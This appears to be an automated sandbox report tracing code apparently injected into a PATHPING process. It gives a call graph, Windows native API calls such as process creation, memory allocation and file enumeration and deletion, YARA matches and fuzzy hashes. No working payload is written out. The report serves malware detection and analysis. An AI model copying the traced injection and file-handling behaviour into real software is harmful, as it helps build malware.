2bc3684 99504->99506 99505 2bc36d0 Sleep 99505->99506 99506->99502 99506->99505 99510 2bc9090 99507->99510 99509 2bcafa1 99509->99503 99511 2bc9128 99510->99511 99513 2bc90be 99510->99513 99512 2bc913e NtAllocateVirtualMemory 99511->99512 99512->99509 99513->99509 99514 2bc8360 99515 2bc83ef 99514->99515 99517 2bc838b 99514->99517 99519 3682ee0 LdrInitializeThunk 99515->99519 99516 2bc8420 99519->99516 99520 2bb835b 99521 2bb8365 99520->99521 99522 2bb834b 99521->99522 99524 2bb6c30 99521->99524 99525 2bb6c46 99524->99525 99527 2bb6c7f 99524->99527 99525->99527 99528 2bb6aa0 LdrLoadDll LdrLoadDll 99525->99528 99527->99522 99528->99527 99529 2bb235a 99532 2bb5e50 99529->99532 99531 2bb2393 99533 2bb5e83 99532->99533 99534 2bb5ea7 99533->99534 99539 2bc8a60 99533->99539 99534->99531 99536 2bc8f20 NtClose 99538 2bb5f4a 99536->99538 99537 2bb5eca 99537->99534 99537->99536 99538->99531 99540 2bc8a7d 99539->99540 99543 3682ca0 LdrInitializeThunk 99540->99543 99541 2bc8aa9 99541->99537 99543->99541 99544 2bb975c 99545 2bb9763 99544->99545 99547 2bb976e 99544->99547 99546 2bcb0e0 RtlAllocateHeap 99545->99546 99546->99547 99548 2bb9796 99547->99548 99549 2bcb000 RtlFreeHeap 99547->99549 99549->99548 99550 2ba9dd0 99551 2baa016 99550->99551 99551->99551 99553 2baa2d2 99551->99553 99554 2bcac70 99551->99554 99555 2bcac93 99554->99555 99560 2ba4090 99555->99560 99557 2bcac9f 99559 2bcacd8 99557->99559 99563 2bc5170 99557->99563 99559->99553 99567 2bb2e10 99560->99567 99562 2ba409d 99562->99557 99564 2bc51d2 99563->99564 99566 2bc51df 99564->99566 99585 2bb15f0 99564->99585 99566->99559 99568 2bb2e2d 99567->99568 99570 2bb2e46 99568->99570 99571 2bc99a0 99568->99571 99570->99562 99573 2bc99ba 99571->99573 99572 2bc99e9 99572->99570 99573->99572 99578 2bc8530 99573->99578 99576 2bc9a62 99576->99570 99577 2bcb000 RtlFreeHeap 99577->99576 99579 2bc854a 99578->99579 99582 3682c0a 99579->99582 99580 2bc8576 99580->99576 99580->99577 99583 3682c1f LdrInitializeThunk 99582->99583 99584 3682c11 99582->99584 99583->99580 99584->99580 99586 2bb162b 99585->99586 99601 2bb7a00 99586->99601 99588 2bb1633 99589 2bcb0e0 RtlAllocateHeap 99588->99589 99599 2bb1906 99588->99599 99590 2bb1649 99589->99590 99591 2bcb0e0 RtlAllocateHeap 99590->99591 99592 2bb165a 99591->99592 99593 2bcb0e0 RtlAllocateHeap 99592->99593 99594 2bb166b 99593->99594 99600 2bb16ff 99594->99600 99616 2bb65b0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99594->99616 99596 2bb40f0 2 API calls 99597 2bb18b2 99596->99597 99612 2bc7ab0 99597->99612 99599->99566 99600->99596 99602 2bb7a2c 99601->99602 99617 2bb78f0 99602->99617 99605 2bb7a59 99607 2bb7a64 99605->99607 99609 2bc8f20 NtClose 99605->99609 99606 2bb7a71 99608 2bb7a8d 99606->99608 99610 2bc8f20 NtClose 99606->99610 99607->99588 99608->99588 99609->99607 99611 2bb7a83 99610->99611 99611->99588 99613 2bc7b12 99612->99613 99615 2bc7b1f 99613->99615 99628 2bb1920 99613->99628 99615->99599 99616->99600 99618 2bb79e6 99617->99618 99619 2bb790a 99617->99619 99618->99605 99618->99606 99623 2bc85d0 99619->99623 99622 2bc8f20 NtClose 99622->99618 99624 2bc85ea 99623->99624 99627 36835c0 LdrInitializeThunk 99624->99627 99625 2bb79da 99625->99622 99627->99625 99644 2bb7cd0 99628->99644 99630 2bb1e83 99630->99615 99631 2bb1940 99631->99630 99648 2bc0cb0 99631->99648 99634 2bb1b4f 99656 2bcc1d0 99634->99656 99635 2bb199b 99635->99630 99651 2bcc0a0 99635->99651 99638 2bb1b64 99640 2bb1bb1 99638->99640 99662 2bb0450 99638->99662 99640->99630 99641 2bb0450 LdrInitializeThunk 99640->99641 99665 2bb7c70 99640->99665 99641->99640 99642 2bb1d03 99642->99640 99643 2bb7c70 LdrInitializeThunk 99642->99643 99643->99642 99645 2bb7cdd 99644->99645 99646 2bb7cfe SetErrorMode 99645->99646 99647 2bb7d05 99645->99647 99646->99647 99647->99631 99649 2bcaf70 NtAllocateVirtualMemory 99648->99649 99650 2bc0cd1 99649->99650 99650->99635 99652 2bcc0b6 99651->99652 99653 2bcc0b0 99651->99653 99654 2bcb0e0 RtlAllocateHeap 99652->99654 99653->99634 99655 2bcc0dc 99654->99655 99655->99634 99657 2bcc140 99656->99657 99658 2bcc19d 99657->99658 99659 2bcb0e0 RtlAllocateHeap 99657->99659 99658->99638 99660 2bcc17a 99659->99660 99661 2bcb000 RtlFreeHeap 99660->99661 99661->99658 99663 2bb0472 99662->99663 99669 2bc91c0 99662->99669 99663->99642 99666 2bb7c83 99665->99666 99674 2bc8430 99666->99674 99668 2bb7cae 99668->99640 99670 2bc91da 99669->99670 99673 3682c70 LdrInitializeThunk 99670->99673 99671 2bc9202 99671->99663 99673->99671 99675 2bc84b1 99674->99675 99677 2bc845e 99674->99677 99679 3682dd0 LdrInitializeThunk 99675->99679 99676 2bc84d6 99676->99668 99677->99668 99679->99676 99680 2bb6e90 99681 2bb6eff 99680->99681 99682 2bb6ea5 99680->99682 99682->99681 99684 2bbae00 99682->99684 99685 2bbae26 99684->99685 99686 2bbb044 99685->99686 99711 2bc9340 99685->99711 99686->99681 99688 2bbaea2 99688->99686 99689 2bcc1d0 2 API calls 99688->99689 99690 2bbaec1 99689->99690 99690->99686 99691 2bbaf89 99690->99691 99692 2bc8530 LdrInitializeThunk 99690->99692 99693 2bb56d0 LdrInitializeThunk 99691->99693 99695 2bbafa2 99691->99695 99694 2bbaf20 99692->99694 99693->99695 99694->99691 99698 2bbaf29 99694->99698 99699 2bbb02c 99695->99699 99717 2bc80a0 99695->99717 99696 2bbaf71 99700 2bb7c70 LdrInitializeThunk 99696->99700 99697 2bbaf55 99732 2bc4300 LdrInitializeThunk 99697->99732 99698->99686 99698->99696 99698->99697 99714 2bb56d0 99698->99714 99705 2bb7c70 LdrInitializeThunk 99699->99705 99704 2bbaf7f 99700->99704 99704->99681 99707 2bbb03a 99705->99707 99706 2bbb003 99722 2bc8150 99706->99722 99707->99681 99709 2bbb01d 99727 2bc82b0 99709->99727 99712 2bc935d 99711->99712 99713 2bc936e CreateProcessInternalW 99712->99713 99713->99688 99715 2bc8700 LdrInitializeThunk 99714->99715 99716 2bb570e 99715->99716 99716->99697 99718 2bc8120 99717->99718 99719 2bc80ce 99717->99719 99733 36839b0 LdrInitializeThunk 99718->99733 99719->99706 99720 2bc8145 99720->99706 99723 2bc81cd 99722->99723 99725 2bc817b 99722->99725 99734 3684340 LdrInitializeThunk 99723->99734 99724 2bc81f2 99724->99709 99725->99709 99728 2bc832d 99727->99728 99729 2bc82db 99727->99729 99735 3682fb0 LdrInitializeThunk 99728->99735 99729->99699 99730 2bc8352 99730->99699 99732->99696 99733->99720 99734->99724 99735->99730 99736 2bbfc90 99737 2bbfcb3 99736->99737 99738 2bb40f0 2 API calls 99737->99738 99739 2bbfcd7 99738->99739 99740 2bbf390 99741 2bbf3f4 99740->99741 99742 2bb5e50 2 API calls 99741->99742 99744 2bbf527 99742->99744 99743 2bbf52e 99744->99743 99769 2bb5f60 99744->99769 99746 2bbf6d3 99747 2bbf5aa 99747->99746 99748 2bbf6e2 99747->99748 99773 2bbf170 99747->99773 99749 2bc8f20 NtClose 99748->99749 99751 2bbf6ec 99749->99751 99752 2bbf5e6 99752->99748 99753 2bbf5f1 99752->99753 99754 2bcb0e0 RtlAllocateHeap 99753->99754 99755 2bbf61a 99754->99755 99756 2bbf639 99755->99756 99757 2bbf623 99755->99757 99782 2bbf060 CoInitialize 99756->99782 99758 2bc8f20 NtClose 99757->99758 99760 2bbf62d 99758->99760 99761 2bbf647 99785 2bc89b0 99761->99785 99763 2bbf6c2 99764 2bc8f20 NtClose 99763->99764 99765 2bbf6cc 99764->99765 99766 2bcb000 RtlFreeHeap 99765->99766 99766->99746 99767 2bbf665 99767->99763 99768 2bc89b0 LdrInitializeThunk 99767->99768 99768->99767 99770 2bb5f85 99769->99770 99789 2bc8840 99770->99789 99774 2bbf18c 99773->99774 99775 2bb40f0 2 API calls 99774->99775 99777 2bbf1aa 99775->99777 99776 2bbf1b3 99776->99752 99777->99776 99778 2bb40f0 2 API calls 99777->99778 99779 2bbf27e 99778->99779 99780 2bb40f0 2 API calls 99779->99780 99781 2bbf2db 99779->99781 99780->99781 99781->99752 99784 2bbf0c5 99782->99784 99783 2bbf15b CoUninitialize 99783->99761 99784->99783 99786 2bc89cd 99785->99786 99794 3682ba0 LdrInitializeThunk 99786->99794 99787 2bc89fd 99787->99767 99790 2bc885d 99789->99790 99793 3682c60 LdrInitializeThunk 99790->99793 99791 2bb5ff9 99791->99747 99793->99791 99794->99787 99800 2bb1f56 99801 2bb1eaf 99800->99801 99802 2bb1f77 99800->99802 99803 2bb1f14 99801->99803 99804 2bb1ed6 99801->99804 99805 2bc8530 LdrInitializeThunk 99801->99805 99808 2bc8fc0 99804->99808 99805->99804 99807 2bb1eeb 99809 2bc9052 99808->99809 99811 2bc8fee 99808->99811 99813 3682e80 LdrInitializeThunk 99809->99813 99810 2bc9083 99810->99807 99811->99807 99813->99810 99814 3682ad0 LdrInitializeThunk 99815 2bb2d03 99816 2bb78f0 2 API calls 99815->99816 99817 2bb2d13 99816->99817 99818 2bc8f20 NtClose 99817->99818 99819 2bb2d2f 99817->99819 99818->99819 99820 2bab180 99821 2bcaf70 NtAllocateVirtualMemory 99820->99821 99822 2bac7f1 99821->99822 99823 2bb59c1 99824 2bb59c9 99823->99824 99825 2bb5a16 99824->99825 99828 2bb5750 99824->99828 99833 2bb5748 99824->99833 99829 2bb7c70 LdrInitializeThunk 99828->99829 99830 2bb5780 99829->99830 99832 2bb57ac 99830->99832 99840 2bb7bf0 99830->99840 99832->99824 99834 2bb574d 99833->99834 99835 2bb5712 99833->99835 99836 2bb5780 99834->99836 99837 2bb7c70 LdrInitializeThunk 99834->99837 99835->99824 99838 2bb7bf0 2 API calls 99836->99838 99839 2bb57ac 99836->99839 99837->99836 99838->99836 99839->99824 99841 2bb7c34 99840->99841 99846 2bb7c55 99841->99846 99847 2bc8200 99841->99847 99843 2bb7c45 99844 2bb7c61 99843->99844 99845 2bc8f20 NtClose 99843->99845 99844->99830 99845->99846 99846->99830 99848 2bc827d 99847->99848 99849 2bc822b 99847->99849 99852 3684650 LdrInitializeThunk 99848->99852 99849->99843 99850 2bc82a2 99850->99843 99852->99850 99853 2bba8c0 99858 2bba5d0 99853->99858 99855 2bba8cd 99872 2bba240 99855->99872 99857 2bba8e9 99859 2bba5f5 99858->99859 99883 2bb7ee0 99859->99883 99862 2bba740 99862->99855 99864 2bba757 99864->99855 99865 2bba74e 99865->99864 99867 2bba845 99865->99867 99902 2bb9c90 99865->99902 99869 2bba8aa 99867->99869 99911 2bba000 99867->99911 99870 2bcb000 RtlFreeHeap 99869->99870 99871 2bba8b1 99870->99871 99871->99855 99873 2bba256 99872->99873 99880 2bba261 99872->99880 99874 2bcb0e0 RtlAllocateHeap 99873->99874 99873->99880 99874->99880 99875 2bba288 99875->99857 99876 2bb7ee0 GetFileAttributesW 99876->99880 99877 2bba5a2 99878 2bba5bb 99877->99878 99879 2bcb000 RtlFreeHeap 99877->99879 99878->99857 99879->99878 99880->99875 99880->99876 99880->99877 99881 2bb9c90 RtlFreeHeap 99880->99881 99882 2bba000 RtlFreeHeap 99880->99882 99881->99880 99882->99880 99884 2bb7f01 99883->99884 99885 2bb7f08 GetFileAttributesW 99884->99885 99886 2bb7f13 99884->99886 99885->99886 99886->99862 99887 2bc2ee0 99886->99887 99888 2bc2eee 99887->99888 99889 2bc2ef5 99887->99889 99888->99865 99890 2bb40f0 2 API calls 99889->99890 99891 2bc2f2a 99890->99891 99892 2bc2f39 99891->99892 99915 2bc29c0 LdrLoadDll LdrLoadDll 99891->99915 99893 2bcb0e0 RtlAllocateHeap 99892->99893 99898 2bc30e7 99892->99898 99895 2bc2f52 99893->99895 99896 2bc30dd 99895->99896 99895->99898 99899 2bc2f6e 99895->99899 99897 2bcb000 RtlFreeHeap 99896->99897 99896->99898 99897->99898 99898->99865 99899->99898 99900 2bcb000 RtlFreeHeap 99899->99900 99901 2bc30d1 99900->99901 99901->99865 99903 2bb9cb6 99902->99903 99916 2bbd6d0 99903->99916 99905 2bb9d28 99907 2bb9ea4 99905->99907 99908 2bb9d46 99905->99908 99906 2bb9e89 99906->99865 99907->99906 99910 2bb9b50 RtlFreeHeap 99907->99910 99908->99906 99921 2bb9b50 99908->99921 99910->99907 99912 2bba026 99911->99912 99913 2bbd6d0 RtlFreeHeap 99912->99913 99914 2bba0ad 99913->99914 99914->99867 99915->99892 99918 2bbd6f4 99916->99918 99917 2bbd6fe 99917->99905 99918->99917 99919 2bcb000 RtlFreeHeap 99918->99919 99920 2bbd741 99919->99920 99920->99905 99922 2bb9b6d 99921->99922 99925 2bbd750 99922->99925 99924 2bb9c73 99924->99908 99926 2bbd774 99925->99926 99927 2bbd81e 99926->99927 99928 2bcb000 RtlFreeHeap 99926->99928 99927->99924 99928->99927 99929 2bc8c00 99930 2bc8cb7 99929->99930 99932 2bc8c2f 99929->99932 99931 2bc8ccd NtCreateFile 99930->99931

                                                                                                                        Executed Functions

                                                                                                                        Function 02BA9DD0 Relevance: 26.6, Strings: 21, Instructions: 326COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 28 2ba9dd0-2baa00c 29 2baa016-2baa026 28->29 29->29 30 2baa028-2baa02f 29->30 31 2baa03a-2baa043 30->31 32 2baa05a-2baa06f 31->32 33 2baa045-2baa058 31->33 35 2baa07a-2baa081 32->35 33->31 36 2baa08e-2baa09a 35->36 37 2baa083-2baa08c 35->37 39 2baa0b9-2baa0c7 36->39 40 2baa09c-2baa0b7 36->40 37->35 41 2baa0d2-2baa0db 39->41 40->36 42 2baa0e9-2baa0f2 41->42 43 2baa0dd-2baa0e7 41->43 45 2baa0f8-2baa0fc 42->45 46 2baa293-2baa29a 42->46 43->41 47 2baa0fe-2baa115 45->47 48 2baa117-2baa11e 45->48 49 2baa29c-2baa2ae 46->49 50 2baa2c4-2baa2cb 46->50 47->45 51 2baa129-2baa12f 48->51 54 2baa2b0-2baa2b4 49->54 55 2baa2b5-2baa2b7 49->55 52 2baa329-2baa330 50->52 53 2baa2cd call 2bcac70 50->53 58 2baa131-2baa13a 51->58 59 2baa147-2baa14a 51->59 61 2baa33b-2baa341 52->61 67 2baa2d2-2baa2d9 53->67 54->55 56 2baa2b9-2baa2bf 55->56 57 2baa2c2 55->57 56->57 57->46 64 2baa13c-2baa142 58->64 65 2baa145 58->65 66 2baa150-2baa16b 59->66 62 2baa34e-2baa355 61->62 63 2baa343-2baa34c 61->63 68 2baa360-2baa366 62->68 63->61 64->65 65->51 66->66 72 2baa16d-2baa17c 66->72 70 2baa2e4-2baa2ed 67->70 73 2baa37a-2baa384 68->73 74 2baa368-2baa378 68->74 75 2baa2fa-2baa301 70->75 76 2baa2ef-2baa2f8 70->76 77 2baa17e-2baa185 72->77 78 2baa1b4-2baa1c5 72->78 80 2baa3b8-2baa3c1 73->80 81 2baa386-2baa3a5 73->81 74->68 83 2baa30c-2baa312 75->83 76->70 85 2baa1af 77->85 86 2baa187-2baa199 77->86 79 2baa1d0-2baa1d4 78->79 87 2baa1f6-2baa200 79->87 88 2baa1d6-2baa1f4 79->88 89 2baa3b6 81->89 90 2baa3a7-2baa3b0 81->90 83->52 93 2baa314-2baa327 83->93 85->46 91 2baa19b-2baa19f 86->91 92 2baa1a0-2baa1a2 86->92 94 2baa211-2baa21b 87->94 88->79 89->73 90->89 91->92 96 2baa1ad 92->96 97 2baa1a4-2baa1aa 92->97 93->83 99 2baa21d-2baa264 94->99 100 2baa266-2baa26d 94->100 96->77 97->96 99->94 101 2baa278-2baa27e 100->101 103 2baa28e 101->103 104 2baa280-2baa28c 101->104 103->42 104->101
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "$#$,$.$5 $61$@@$F$N$O$T$U$p$pr$q$s$xQ$|NF$#$'$S
                                                                                                                        • API String ID: 0-3021803578
                                                                                                                        • Opcode ID: 754f0cb54fcd78cffda4c783da919a90f3df321dca8da1cf13a93dbbad2473d3
                                                                                                                        • Instruction ID: dd1e882b5ded4813fb49aaf9493068782661675b8e4a83c62e34105d4bf88bc9
                                                                                                                        • Opcode Fuzzy Hash: 754f0cb54fcd78cffda4c783da919a90f3df321dca8da1cf13a93dbbad2473d3
                                                                                                                        • Instruction Fuzzy Hash: 8F02BFB0D08219CFEB24CF95C8A4BEDBBB5FB45308F2081D9C4596B281D7B56A88CF54
                                                                                                                        Function 02BBC160 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 02BBC244
                                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 02BBC27F
                                                                                                                        • FindClose.KERNELBASE(?), ref: 02BBC28A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3541575487-0
                                                                                                                        • Opcode ID: f574dcca9fe591d4dd08330b55f3ca42781a6a5cf25310e43f55454e88115543
                                                                                                                        • Instruction ID: 7330036e07d7ffc824dad6355846dbbac7a448b94d5caa5524abf298b7f6b5ea
                                                                                                                        • Opcode Fuzzy Hash: f574dcca9fe591d4dd08330b55f3ca42781a6a5cf25310e43f55454e88115543
                                                                                                                        • Instruction Fuzzy Hash: AF3152719102087FDB61DFA4CC85FFF777DEF44B44F14459AB958A6180EAB0AA848FA0
                                                                                                                        Function 02BC8C00 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtCreateFile.NTDLL(?,?,?,5D33299C,?,?,?,?,?,?,?), ref: 02BC8CFE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 823142352-0
                                                                                                                        • Opcode ID: 3a538545ac33b4e89461af44c7dd5fa6b640ccf2d02e9bd38c0d6b0058846378
                                                                                                                        • Instruction ID: e151afd70eb2beb1e6cf9d8d6be6bc846e06da28d71eb614aa8f13e19c2e5049
                                                                                                                        • Opcode Fuzzy Hash: 3a538545ac33b4e89461af44c7dd5fa6b640ccf2d02e9bd38c0d6b0058846378
                                                                                                                        • Instruction Fuzzy Hash: 9331B4B5A01248AFDB14DF99D880EEFBBB9AF88314F108149F919A7344D730A851CFA1
                                                                                                                        Function 02BC8D70 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtReadFile.NTDLL(?,?,?,5D33299C,?,?,?,?,?), ref: 02BC8E59
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 3f8db6c77631d86ce37d9d3fe5275efd892d8e28885a73c69f0e239a369adcbe
                                                                                                                        • Instruction ID: de4271dd230c1f611d23486c9972f1963c75b3b4f6c6557b8a8692faffb8e184
                                                                                                                        • Opcode Fuzzy Hash: 3f8db6c77631d86ce37d9d3fe5275efd892d8e28885a73c69f0e239a369adcbe
                                                                                                                        • Instruction Fuzzy Hash: D431E9B5A00208AFDB14DF99D881EEFB7B9EF88714F108149F918A7340D730A811CFA1
                                                                                                                        Function 02BC9090 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtAllocateVirtualMemory.NTDLL(02BB199B,?,02BC7B1F,5D33299C,00000004,00003000,?,?,?,?,?,02BC7B1F,02BB199B,?,?,02BCAFA1), ref: 02BC915B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2167126740-0
                                                                                                                        • Opcode ID: 1409185346ce7a013563e4669413ced259aff9e196a2489ade36b6e6bc90393b
                                                                                                                        • Instruction ID: 4d9fe0fdce7db85aa32ddf2afc0d4838bb03571acaefb82d10838e3299545d0e
                                                                                                                        • Opcode Fuzzy Hash: 1409185346ce7a013563e4669413ced259aff9e196a2489ade36b6e6bc90393b
                                                                                                                        • Instruction Fuzzy Hash: A52124B5A00249AFDB10DF98D881EEFBBB9EF89710F108149F918A7240D770A8518FA1
                                                                                                                        Function 02BC8E70 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4033686569-0
                                                                                                                        • Opcode ID: 70c51c4d1c49d97d4bd7d0c6d274920f4979941384b9263865c7b785f2aa4232
                                                                                                                        • Instruction ID: 445dec3cd3c846c5dc213bc2faa413f12a9499e61ba11304deb0d4c15fe3e2ae
                                                                                                                        • Opcode Fuzzy Hash: 70c51c4d1c49d97d4bd7d0c6d274920f4979941384b9263865c7b785f2aa4232
                                                                                                                        • Instruction Fuzzy Hash: 56115171A00608BFD710EB69CC51FABB76DDF85714F50854DF918A7280DB7169058BA1
                                                                                                                        Function 02BC8F20 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02BC8F57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4134567392.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_2ba0000_PATHPING.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3535843008-0
                                                                                                                        • Opcode ID: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                        • Instruction ID: f0de992e8f61e97b7ab7a5f53fbc168656fb81df792073530e28bcb144fa82a8
                                                                                                                        • Opcode Fuzzy Hash: c327015965e002ba6da806d7b35ba06a045db85dc36153716a3361cbcbb9684d
                                                                                                                        • Instruction Fuzzy Hash: 81E046362102087FD620EA5ADC00F9B7BADEFC6720F418459FA09A7240CA70B9028BB1
                                                                                                                        Function 03684340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 6a3e91656c10d1b0817efccf547222b12773e26e68738db8feed2e75e656f7ff
                                                                                                                        • Instruction ID: 1b7075e8bbe821f69097c9a685f194ac6327cf870ebfc9e4343ee145f0047142
                                                                                                                        • Opcode Fuzzy Hash: 6a3e91656c10d1b0817efccf547222b12773e26e68738db8feed2e75e656f7ff
                                                                                                                        • Instruction Fuzzy Hash: 1190023160580412A940B5584884546400997E1301B55C012E0428654D8B548A565365
                                                                                                                        Function 03684650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: d6a351e36cbd07231a9809b2654f448d97fbb709c2f59cae77b0c8d539bb05f8
                                                                                                                        • Instruction ID: 820cb93b7cb870a217de322a4ec0631cf6724435173e5f97f8c107e2cc62caf3
                                                                                                                        • Opcode Fuzzy Hash: d6a351e36cbd07231a9809b2654f448d97fbb709c2f59cae77b0c8d539bb05f8
                                                                                                                        • Instruction Fuzzy Hash: DD900261601504425940B5584804406600997E2301395C116A0558660D87588955926D
                                                                                                                        Function 03682B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 94919ccb63a47e8fd113e8712e3ae9e4683cd87895082db6e738e7a0de85101f
                                                                                                                        • Instruction ID: 570e7c8adbd3153d0fc6e93b7d78b460afd35fa8c3bb03c53792d24638980260
                                                                                                                        • Opcode Fuzzy Hash: 94919ccb63a47e8fd113e8712e3ae9e4683cd87895082db6e738e7a0de85101f
                                                                                                                        • Instruction Fuzzy Hash: 99900261202404035905B5584414616400E87E1201B55C022E1018690EC66589916129
                                                                                                                        Function 03682BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
